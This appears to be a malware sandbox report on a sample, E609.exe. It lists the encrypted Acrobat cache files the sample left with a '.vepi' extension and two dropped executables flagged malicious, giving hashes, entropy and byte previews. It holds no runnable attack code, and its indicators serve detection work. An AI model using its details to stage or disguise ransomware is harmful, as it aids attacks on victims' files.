Preview:	2023/.W.....=..'k.e..S.Q+u`..8....%....:o..-.[..E.w....s!........q.\|...5..T...8C.C]J.^..u).}(_5..g.\|.....(...+'=;&^...J...8..,...!/.l6...S..@..U..W.j\f...A;........k.Y.P.!......%+Jy.^OPH..Wi.>.a9.....6.1.......B&...mq.!Z~....h!..y.....i.m8].N"..l....W$Q..GL.A...MJ...7,g..V.W<.f.b.f..wd7y.V.Y0.M......V.R.k.le...?...%..mtW.......n.i.>....g.q.....r..7.bj.-62TFc2.........q.I..(.. .P..@.$.....5.. .........X...b......;./L_."....{r.Fr.....Q.(...h ..G.w.:02..g>Qt..M...Oz9T..N.P...Nv.%....Hi)(.Q.. j..$.:..p.....G.."DJ......x...^Lk.J..\|OBI....rKj.A,..`....N.....'9...X.h...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	670
Entropy (8bit):	7.702034177111396
Encrypted:	false
SSDEEP:	12:k/Ya/m7iCgoBdy2UBtsJ3UPom8ur2CdncxLT+Z0Ni6D1g2Jm9Lf1+cii9a:We7i8BSsJ3UPX8CX1M+SU65g2JiLsbD
MD5:	81BD84D9D32A5B034D97A431EF6B776C
SHA1:	5EDD71FE7966890E5277B0AA52339A8725A69B07
SHA-256:	4868A9A199C41E1F08848E7F47048CBFF4C03A414E5E8DB263B1B7DE436AA6A1
SHA-512:	BF4369A488162AFA1877BDFFAE85A1746562FA56CD0A0BBFEC6DE2731275546AD7E3257FBC7E643C908B777CD1391238BDA0663EE94990D496EE2E8A79D72D91
Malicious:	false
Preview:	2023/.W.....=..'k.e..S.Q+u`..8....%....:o..-.[..E.w....s!........q.\|...5..T...8C.C]J.^..u).}(_5..g.\|.....(...+'=;&^...J...8..,...!/.l6...S..@..U..W.j\f...A;........k.Y.P.!......%+Jy.^OPH..Wi.>.a9.....6.1.......B&...mq.!Z~....h!..y.....i.m8].N"..l....W$Q..GL.A...MJ...7,g..V.W<.f.b.f..wd7y.V.Y0.M......V.R.k.le...?...%..mtW.......n.i.>....g.q.....r..7.bj.-62TFc2.........q.I..(.. .P..@.$.....5.. .........X...b......;./L_."....{r.Fr.....Q.(...h ..G.w.:02..g>Qt..M...Oz9T..N.P...Nv.%....Hi)(.Q.. j..$.:..p.....G.."DJ......x...^Lk.J..\|OBI....rKj.A,..`....N.....'9...X.h...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	818
Entropy (8bit):	7.740766520655221
Encrypted:	false
SSDEEP:	24:YKWsbGZmgGnwZ9+UR9jItdi/c20XB34ojbD:Ye1wZlHjIbi/cvBoyD
MD5:	729A5B9EF514B48289916100B44D4E4B
SHA1:	97CD9B47ED4ADAD88994E139A406DEB7FEDD617C
SHA-256:	4B8373DAB2008DCC3549797E96EC3BB6BD23CAFEE3D63763E2718304A40A89B9
SHA-512:	3506AAAB992A6656F8BCF43A3985B596BA3AEF45BE191CBC63D53A45E57F432FDB5ADF78BECED28087F022C9242E1FE9A3BD801F465C28FAE667B095741AC7D2
Malicious:	false
Preview:	{"os_.Rm...........c\kj.)'^..,..".F...v.%m?Ck...Od9..]...)i.d\|]Xm...>.........p...l.b=....#...2..{.I..-..../......5......^5.^.Ik..tL.H.1....oU.].....9x.S....l.Y..C.R..&.^....?....>......j...B..%<o...@.".;.h(..QK}mGc$S.....{#=..G...#..-4..........E..J.......y.`..q'z..).w.[(\|V.[.....6+[+6.%c..)?I...K...0......W[xV...~..*-.W{:...........'...5.k7...hkN.;.+v..F....d.^B.1i.$._....6.H....f.>.(#j....o....],.d6r.L..iD.^.A<.GH..m."0...d~..Bp1.(..W.n....f..IQa.z.i..Lb.r.T.P...i......P..I...Q....h...q".$........\...?.....q.qr\|-...x....k.>_.#.s0...P..HcgA..Gz...T..<.......r...k5.JF`..CpE(j.DF.....^h....C..f..C.U..6..w......[%..ltl^.`...~"..}..oT<.J.h.C.}.p.V[....t..........l...M....\.M+,..=t....6...v!.t...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	818
Entropy (8bit):	7.740766520655221
Encrypted:	false
SSDEEP:	24:YKWsbGZmgGnwZ9+UR9jItdi/c20XB34ojbD:Ye1wZlHjIbi/cvBoyD
MD5:	729A5B9EF514B48289916100B44D4E4B
SHA1:	97CD9B47ED4ADAD88994E139A406DEB7FEDD617C
SHA-256:	4B8373DAB2008DCC3549797E96EC3BB6BD23CAFEE3D63763E2718304A40A89B9
SHA-512:	3506AAAB992A6656F8BCF43A3985B596BA3AEF45BE191CBC63D53A45E57F432FDB5ADF78BECED28087F022C9242E1FE9A3BD801F465C28FAE667B095741AC7D2
Malicious:	false
Preview:	{"os_.Rm...........c\kj.)'^..,..".F...v.%m?Ck...Od9..]...)i.d\|]Xm...>.........p...l.b=....#...2..{.I..-..../......5......^5.^.Ik..tL.H.1....oU.].....9x.S....l.Y..C.R..&.^....?....>......j...B..%<o...@.".;.h(..QK}mGc$S.....{#=..G...#..-4..........E..J.......y.`..q'z..).w.[(\|V.[.....6+[+6.%c..)?I...K...0......W[xV...~..*-.W{:...........'...5.k7...hkN.;.+v..F....d.^B.1i.$._....6.H....f.>.(#j....o....],.d6r.L..iD.^.A<.GH..m."0...d~..Bp1.(..W.n....f..IQa.z.i..Lb.r.T.P...i......P..I...Q....h...q".$........\...?.....q.qr\|-...x....k.>_.#.s0...P..HcgA..Gz...T..<.......r...k5.JF`..CpE(j.DF.....^h....C..f..C.U..6..w......[%..ltl^.`...~"..}..oT<.J.h.C.}.p.V[....t..........l...M....\.M+,..=t....6...v!.t...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	4168
Entropy (8bit):	7.962078162820452
Encrypted:	false
SSDEEP:	96:kN/CcuWn+DBrKmuxCJronSPAiHDa8k/45/G9IUbCm8V/ffB:kR0Wn+ZKmLroSPvjw45U/l8ZJ
MD5:	13E3F58F40FDB197F80A16A0A21206AD
SHA1:	E152DDBDCE470843332D4785E2BB3DABF18D69C4
SHA-256:	791817906957D59B4902BDDA33E1BD76D6DAF7C4E9D5D4630753B32085E38FAA
SHA-512:	90D60BE6611CFBE5DDE1FFE55014B63DB4539D181AF61A166D3BB1B297144EF40D2DBDFA7285073F21948F9299D76F6150D2859ECB4F8395E7AAA96DFF13CCF3
Malicious:	false
Preview:	...#..g;.....N1..../.1.zR.O$.C1Q&EAw.^...6q...Q.+...x..Ob..........3....U.....bn. t......../..`.A+...U.D..}.H;8.R...p...c...b7.[TX........\`..KR.....c6..:.j..v%s..BK%.dJ6..V%..jn.d4.f.....5...;. >."n.....^..BT.u.-..{.@...jz...W (."ou4._....}.?.3..._.M.(.\|T ..;+..?..ajm.`..o.1....}.....B5.b.thzl..F.a_ky.%..,ub'....,.A<.Z........IM.8......R.@.......m.....+.....v...................a.C.5.Y.........Y&.Y,...>1L.W...9,.-..%.H@..I........m..R.>..Xp..:.1z>=.k.E=;e.N.....`2..").....-Z..3.NOa....r.!N.k.BYF;8.......-Uj&......!.#\xg.W?..m.d..\|\|..N.+...7.h(Q..O.}qt..{...$..?)..e.3.F..5..;..[.t.....d..c+L...>...t.<...(6....f.s....}=.8TK~.\|.y.I...[W......F..... ;G..Kot....-*.....PL."7^=\|..W.LG...f9.g.'.&...;1..@.hsZY.......t.V....5."a.%..< ^..a.....[.04....Q~...^.... &.i..]. ..0v..A....jX1.l....Lio.^{J._..r+='.q1\..v.Fv.Q.........^mR@..P..F.v`.x)t.!.V.7.......5.0)..g....n...!/R.r...HZ......I..6..TG.....a.g....k......u..7...q'q.......[..P............%.O....-.

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	4168
Entropy (8bit):	7.962078162820452
Encrypted:	false
SSDEEP:	96:kN/CcuWn+DBrKmuxCJronSPAiHDa8k/45/G9IUbCm8V/ffB:kR0Wn+ZKmLroSPvjw45U/l8ZJ
MD5:	13E3F58F40FDB197F80A16A0A21206AD
SHA1:	E152DDBDCE470843332D4785E2BB3DABF18D69C4
SHA-256:	791817906957D59B4902BDDA33E1BD76D6DAF7C4E9D5D4630753B32085E38FAA
SHA-512:	90D60BE6611CFBE5DDE1FFE55014B63DB4539D181AF61A166D3BB1B297144EF40D2DBDFA7285073F21948F9299D76F6150D2859ECB4F8395E7AAA96DFF13CCF3
Malicious:	false
Preview:	...#..g;.....N1..../.1.zR.O$.C1Q&EAw.^...6q...Q.+...x..Ob..........3....U.....bn. t......../..`.A+...U.D..}.H;8.R...p...c...b7.[TX........\`..KR.....c6..:.j..v%s..BK%.dJ6..V%..jn.d4.f.....5...;. >."n.....^..BT.u.-..{.@...jz...W (."ou4._....}.?.3..._.M.(.\|T ..;+..?..ajm.`..o.1....}.....B5.b.thzl..F.a_ky.%..,ub'....,.A<.Z........IM.8......R.@.......m.....+.....v...................a.C.5.Y.........Y&.Y,...>1L.W...9,.-..%.H@..I........m..R.>..Xp..:.1z>=.k.E=;e.N.....`2..").....-Z..3.NOa....r.!N.k.BYF;8.......-Uj&......!.#\xg.W?..m.d..\|\|..N.+...7.h(Q..O.}qt..{...$..?)..e.3.F..5..;..[.t.....d..c+L...>...t.<...(6....f.s....}=.8TK~.\|.y.I...[W......F..... ;G..Kot....-*.....PL."7^=\|..W.LG...f9.g.'.&...;1..@.hsZY.......t.V....5."a.%..< ^..a.....[.04....Q~...^.... &.i..]. ..0v..A....jX1.l....Lio.^{J._..r+='.q1\..v.Fv.Q.........^mR@..P..F.v`.x)t.!.V.7.......5.0)..g....n...!/R.r...HZ......I..6..TG.....a.g....k......u..7...q'q.......[..P............%.O....-.

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	658
Entropy (8bit):	7.651355622343429
Encrypted:	false
SSDEEP:	12:kX2JD4VA65oG3dmKAq6YFpz+SZyEtwmemdXJ3wl2tQjEp9V1+cii9a:uVZSGSq6YFcSZyUeUJ3wlyQi0bD
MD5:	297D82A4150CACBCC24AA68653B2BC37
SHA1:	2E7E26AAFC849F7D620E2C7AE94603C1D845ED33
SHA-256:	4B5E619F49C38A3BA091FB2137D7D799D1C1902711546F7EDDB0846AC78B7287
SHA-512:	45D4F387E2FF14614153A61210FEB46AD36CA8AFA468CD0D0BD7A18391A0BEDA0B9B7F9F016A7C8750B28FDEC100C87E618C8C0362F02AEBE3F052744DD70732
Malicious:	false
Preview:	2023/...Md;%...V.m...Ekc;.."......T6..&V8.&.l../CP....rX..;`.M..1v...Y.$$......,......J.%.9....j..=..?..A.F..:.......y.L.OlE....%..p.@..Uu.Uo5.....B..5....{.D....}..K {Y`....s...(./...D.{a.Ki<8t...R?o...'....^.....Q._[........A.....7.,...?...\......a.3..A.._H.yjjI6.kF.!.Ko'R...Y..`.iF...w.;z.O.}.}.Iy.\..,.Uj...{.....R]k.X..i .gl..N....T #.....L"<a.=.,n0...... .<.:.'V$..i....'..\.....1Xk#O....k7....&;....l.:...6.p..OW[N..ZA..y...`+<..6\..O.....b...l.,........Y...Q../.~.$,...kT9.{Z....G.....7..VT......M%r.P@^..$.\|."..~.{t^../t.t...t.\|.B........KUSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	658
Entropy (8bit):	7.651355622343429
Encrypted:	false
SSDEEP:	12:kX2JD4VA65oG3dmKAq6YFpz+SZyEtwmemdXJ3wl2tQjEp9V1+cii9a:uVZSGSq6YFcSZyUeUJ3wlyQi0bD
MD5:	297D82A4150CACBCC24AA68653B2BC37
SHA1:	2E7E26AAFC849F7D620E2C7AE94603C1D845ED33
SHA-256:	4B5E619F49C38A3BA091FB2137D7D799D1C1902711546F7EDDB0846AC78B7287
SHA-512:	45D4F387E2FF14614153A61210FEB46AD36CA8AFA468CD0D0BD7A18391A0BEDA0B9B7F9F016A7C8750B28FDEC100C87E618C8C0362F02AEBE3F052744DD70732
Malicious:	false
Preview:	2023/...Md;%...V.m...Ekc;.."......T6..&V8.&.l../CP....rX..;`.M..1v...Y.$$......,......J.%.9....j..=..?..A.F..:.......y.L.OlE....%..p.@..Uu.Uo5.....B..5....{.D....}..K {Y`....s...(./...D.{a.Ki<8t...R?o...'....^.....Q._[........A.....7.,...?...\......a.3..A.._H.yjjI6.kF.!.Ko'R...Y..`.iF...w.;z.O.}.}.Iy.\..,.Uj...{.....R]k.X..i .gl..N....T #.....L"<a.=.,n0...... .<.:.'V$..i....'..\.....1Xk#O....k7....&;....l.:...6.p..OW[N..ZA..y...`+<..6\..O.....b...l.,........Y...Q../.~.$,...kT9.{Z....G.....7..VT......M%r.P@^..$.\|."..~.{t^../t.t...t.\|.B........KUSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.46430328764384
Encrypted:	false
SSDEEP:	12:mre0POUJjSesKQUxXja0iTbEhcbz1+cii9a:m35uRKQUJj/6fAbD
MD5:	F607A8B7920FF90AE0E2F0BD595C0EE7
SHA1:	85D990DE7BD65F627159FA97C88001770F899A11
SHA-256:	23CE7FE9268C84AC5305EBA6D9D350B4908DBA5016DB5624830FCE9E971C2DAF
SHA-512:	67F5E170FCD80BECA8D84DF0E977670EF74E172E7A1C0A199E36AC2568D94173B8437306C5F3EFC73146A92591B0E3F72CB12BD7B104996A15E79F76245AE45F
Malicious:	false
Preview:	S.z1.....B]...l.:FH.....I.\|..l.?$,`.}%..&..B.....=.>...K...].p...z...Aq......F1.5.....!..P...T....q.N.C......0.wy..A.su.=.=$?._......Ly...-Q..6..>....^.%.l..K..S..[T+...r.....4.Q7.....d.h[...M..M..G.S3V.l;..lk..4&N...N...u.i.6T.yD.Q';."Y.4.K\....61.$b.B..&.g.....A..M.Q..."....`....(.Qw..........Q..ae...."...O..VQm...6S...Na~b..2..'..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.46430328764384
Encrypted:	false
SSDEEP:	12:mre0POUJjSesKQUxXja0iTbEhcbz1+cii9a:m35uRKQUJj/6fAbD
MD5:	F607A8B7920FF90AE0E2F0BD595C0EE7
SHA1:	85D990DE7BD65F627159FA97C88001770F899A11
SHA-256:	23CE7FE9268C84AC5305EBA6D9D350B4908DBA5016DB5624830FCE9E971C2DAF
SHA-512:	67F5E170FCD80BECA8D84DF0E977670EF74E172E7A1C0A199E36AC2568D94173B8437306C5F3EFC73146A92591B0E3F72CB12BD7B104996A15E79F76245AE45F
Malicious:	false
Preview:	S.z1.....B]...l.:FH.....I.\|..l.?$,`.}%..&..B.....=.>...K...].p...z...Aq......F1.5.....!..P...T....q.N.C......0.wy..A.su.=.=$?._......Ly...-Q..6..>....^.%.l..K..S..[T+...r.....4.Q7.....d.h[...M..M..G.S3V.l;..lk..4&N...N...u.i.6T.yD.Q';."Y.4.K\....61.$b.B..&.g.....A..M.Q..."....`....(.Qw..........Q..ae...."...O..VQm...6S...Na~b..2..'..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	617
Entropy (8bit):	7.588961416807497
Encrypted:	false
SSDEEP:	12:krWevVSP4aXptBPpfE/5wmVGbD1C6ZQLFUV1dRF2u2mmK1+cii9a:SPvVMv5qx9V+1C6gFUNcmibD
MD5:	AF83239545074F495D8C74B22EEDBDC4
SHA1:	AB3F6F70775DDC154E96E30E35483063C241654A
SHA-256:	D4387B133CF7A4BD926F955EEA062E04576388CBEB9A559729E57BD43C6D5975
SHA-512:	0858C2789968F15C1DBE833DD7E32F3AFBF48ADAF17C59B99E2F0DDB4E783359A9D48A1FAE56880C72E89D27E0C8BC2CEA706D934C3C211DB7CEF0FBF91B47EB
Malicious:	false
Preview:	2023/.V..A.2m.=..+.....W2g..e...n,^a....j..,..D%.j...`...1.....~.L..(LJ'...Z..r.UeOgYBc.....:..T....4.U........qX7.~1+....c....&.R.....m....$...D.`.T.0.a........w....~Z.:....'..l.:&hg..e..."_...5.....A.N]S=.....tU.c.2.5C..M.S..C.3....^.:.+.c2..A..E..b.,.....0@.>....Ts...........>.@t.pp&...g].T..!.S>I@]....)v.....dyZQ...<......u7...n.e..+...$.0..m.\|.F.85+.mCJLq.c`T.$}..Nv.!..s..kPWR.D.hn.$.3.......Z.J......mp.L.U.f.E._?..=.h..8.u?.Y8L.2.v@...c...\|.......c...L.......1.c..7..2......%..c.:....,C..2..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG.old.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	617
Entropy (8bit):	7.588961416807497
Encrypted:	false
SSDEEP:	12:krWevVSP4aXptBPpfE/5wmVGbD1C6ZQLFUV1dRF2u2mmK1+cii9a:SPvVMv5qx9V+1C6gFUNcmibD
MD5:	AF83239545074F495D8C74B22EEDBDC4
SHA1:	AB3F6F70775DDC154E96E30E35483063C241654A
SHA-256:	D4387B133CF7A4BD926F955EEA062E04576388CBEB9A559729E57BD43C6D5975
SHA-512:	0858C2789968F15C1DBE833DD7E32F3AFBF48ADAF17C59B99E2F0DDB4E783359A9D48A1FAE56880C72E89D27E0C8BC2CEA706D934C3C211DB7CEF0FBF91B47EB
Malicious:	false
Preview:	2023/.V..A.2m.=..+.....W2g..e...n,^a....j..,..D%.j...`...1.....~.L..(LJ'...Z..r.UeOgYBc.....:..T....4.U........qX7.~1+....c....&.R.....m....$...D.`.T.0.a........w....~Z.:....'..l.:&hg..e..."_...5.....A.N]S=.....tU.c.2.5C..M.S..C.3....^.:.+.c2..A..E..b.,.....0@.>....Ts...........>.@t.pp&...g].T..!.S>I@]....)v.....dyZQ...<......u7...n.e..+...$.0..m.\|.F.85+.mCJLq.c`T.$}..Nv.!..s..kPWR.D.hn.$.3.......Z.J......mp.L.U.f.E._?..=.h..8.u?.Y8L.2.v@...c...\|.......c...L.......1.c..7..2......%..c.:....,C..2..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.535066879509159
Encrypted:	false
SSDEEP:	12:GP3F/4uZRZElTslIo/JhPG2jC2+jiqTYM1+cii9a:GP3d/yWL/XPh2pjiAYHbD
MD5:	B4AF6AF0EF1F615F84F19357631AA075
SHA1:	F9254C3B5C95BF8845DBBBCA465F63B6C4391035
SHA-256:	22D058AF122EE3F11D4CE24C1B4067BDC49AB09C81AB3C5A412742C233CA024D
SHA-512:	40E5C6F85926132051EBAC7822C95329571689692EC6D6D299E1D22429DEF2EA9BE4FE58D901D9886D33D0632060A300C56A331139CF8D1C514E534141CDD19A
Malicious:	false
Preview:	.h.6.F..+.}+.[.}\|gz."..........V%.w..u].L.S...;.......6.i..C.)...cJ.P6(..(..RY...X.`............K.M.`..X...>..E.4'}@..Mx~sU.:~....V...8&..R?/c.}.Xa._...H.S...TP.u..+..G....O.....?.q.i...Y.U....3y....b ..A.!N.Uw<..QzM.j>.....J.H...M/.\|R.^..qmT.f...)o+..-}.A..}......2..vR.q.+..}..<..0......s._;IC8o. 2!.?.M...a..D...WxE....wCw.qWu.v.p....o.0.,....oZ...{......P.7.t.........9..l...+.@.6.*.hl.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.535066879509159
Encrypted:	false
SSDEEP:	12:GP3F/4uZRZElTslIo/JhPG2jC2+jiqTYM1+cii9a:GP3d/yWL/XPh2pjiAYHbD
MD5:	B4AF6AF0EF1F615F84F19357631AA075
SHA1:	F9254C3B5C95BF8845DBBBCA465F63B6C4391035
SHA-256:	22D058AF122EE3F11D4CE24C1B4067BDC49AB09C81AB3C5A412742C233CA024D
SHA-512:	40E5C6F85926132051EBAC7822C95329571689692EC6D6D299E1D22429DEF2EA9BE4FE58D901D9886D33D0632060A300C56A331139CF8D1C514E534141CDD19A
Malicious:	false
Preview:	.h.6.F..+.}+.[.}\|gz."..........V%.w..u].L.S...;.......6.i..C.)...cJ.P6(..(..RY...X.`............K.M.`..X...>..E.4'}@..Mx~sU.:~....V...8&..R?/c.}.Xa._...H.S...TP.u..+..G....O.....?.q.i...Y.U....3y....b ..A.!N.Uw<..QzM.j>.....J.H...M/.\|R.^..qmT.f...)o+..-}.A..}......2..vR.q.+..}..<..0......s._;IC8o. 2!.?.M...a..D...WxE....wCw.qWu.v.p....o.0.,....oZ...{......P.7.t.........9..l...+.@.6.*.hl.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	modified
Size (bytes):	635
Entropy (8bit):	7.613857578057008
Encrypted:	false
SSDEEP:	12:kW4d7Rx6TGk2CAta+pO2fKvkWbxc0WPSG9+a032ZlrbJrzAfiN8nUf1+cii9a:Cay8CoeFaI+axlvJYKanUsbD
MD5:	19157162703675252D6AF730BEC0FA20
SHA1:	BDB83B826DFF020F21BC24E46E6756754146C728
SHA-256:	E35F1FCE7CA38F666243E2527ECAB61EE7D0537E675DE96E9FFFC34810A423E1
SHA-512:	DFE5F035AC5BFE10A6894FF27FC4BF16700E59CDDB05E4BC0E3C19505D40227A449037F277BFCF01CE61B539276C9E8CF7761867061A36460D718C87E4520373
Malicious:	false
Preview:	2023/byj+.3.v....x.\.....j.O......s.PK.m.C..7A.>l$..'..97..d;1.....{Ei.....(g........A..u.cD.}._.v.b.0..`....ds......b.o.&.N....:..CW.W...>....r7>.8\.n.:.e.QU....b.......+WY.....P.b....!4.B..q.<...uMBeH..y...&...SW.c........]...).Q.\ .."..$.H(.P.N.g;. .6\.............\Vc.a.5.0..?.....+.Z`.@.......".....3.. .(......:qYjW.......+..~..>Y.Ng.....!..3.m../1..H.....@..8...fJ...q..p....s;)...h.....l.d[2 .I.........j..F-.q..........SV/.c..v...`.......B..e.....)8...$...\|I..c.Q..%.FM...;/..:.e3.hG.}F....L.W.;.A.9`#...*.........}M=.....SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG.old.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	635
Entropy (8bit):	7.613857578057008
Encrypted:	false
SSDEEP:	12:kW4d7Rx6TGk2CAta+pO2fKvkWbxc0WPSG9+a032ZlrbJrzAfiN8nUf1+cii9a:Cay8CoeFaI+axlvJYKanUsbD
MD5:	19157162703675252D6AF730BEC0FA20
SHA1:	BDB83B826DFF020F21BC24E46E6756754146C728
SHA-256:	E35F1FCE7CA38F666243E2527ECAB61EE7D0537E675DE96E9FFFC34810A423E1
SHA-512:	DFE5F035AC5BFE10A6894FF27FC4BF16700E59CDDB05E4BC0E3C19505D40227A449037F277BFCF01CE61B539276C9E8CF7761867061A36460D718C87E4520373
Malicious:	false
Preview:	2023/byj+.3.v....x.\.....j.O......s.PK.m.C..7A.>l$..'..97..d;1.....{Ei.....(g........A..u.cD.}._.v.b.0..`....ds......b.o.&.N....:..CW.W...>....r7>.8\.n.:.e.QU....b.......+WY.....P.b....!4.B..q.<...uMBeH..y...&...SW.c........]...).Q.\ .."..$.H(.P.N.g;. .6\.............\Vc.a.5.0..?.....+.Z`.@.......".....3.. .(......:qYjW.......+..~..>Y.Ng.....!..3.m../1..H.....@..8...fJ...q..p....s;)...h.....l.d[2 .I.........j..F-.q..........SV/.c..v...`.......B..e.....)8...$...\|I..c.Q..%.FM...;/..:.e3.hG.}F....L.W.;.A.9`#...*.........}M=.....SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	232448
Entropy (8bit):	7.222439676177051
Encrypted:	false
SSDEEP:	3072:xxr0DOihufZk6+IEs79tztiUKkfPucceIfEgSbMpOrq+nsu9wYS:x0oe6xBtEkfPuckcgSJ5nbCY
MD5:	4F54B83888A62CDD3584C0A0FEE970D8
SHA1:	AA281745AC08596281522253FD1A11CB57995B48
SHA-256:	1932C3563AC01B8278F40493EF7D3F78413F4D5E86B9D1E0483001BB07654BC2
SHA-512:	B370130012936E3DBB033FC53618F5134041841781C37E664DAADBEE82AE900933BA4A97354C0565F8531E31EEC62AC4DB06398E3719A18EFA4D3C93737D78A1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.*.uuD.uuD.uuD.x'..muD.x'...uD.x'..RuD.\|...ruD.uuE..uD....tuD.x'..tuD....tuD.RichuuD.................PE..L....._e.............................6............@.................................\6.......................................P..P.......(w...........................Q..............................`F..@...............\............................text............................... ..`.rdata...h.......j..................@..@.data...@ ...`.......J..............@....rsrc...(w.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	306688
Entropy (8bit):	6.7250330334577075
Encrypted:	false
SSDEEP:	6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
MD5:	41B883A061C95E9B9CB17D4CA50DE770
SHA1:	1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
SHA-256:	FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
SHA-512:	CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
Malicious:	true
